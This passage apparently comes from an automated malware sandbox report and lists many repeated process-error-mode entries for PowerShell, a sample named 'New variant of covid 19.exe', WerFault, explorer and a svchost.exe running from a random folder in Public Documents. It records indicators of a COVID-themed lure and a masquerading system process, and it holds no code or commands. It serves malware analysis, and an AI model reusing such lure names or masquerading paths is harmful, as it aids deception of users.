      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
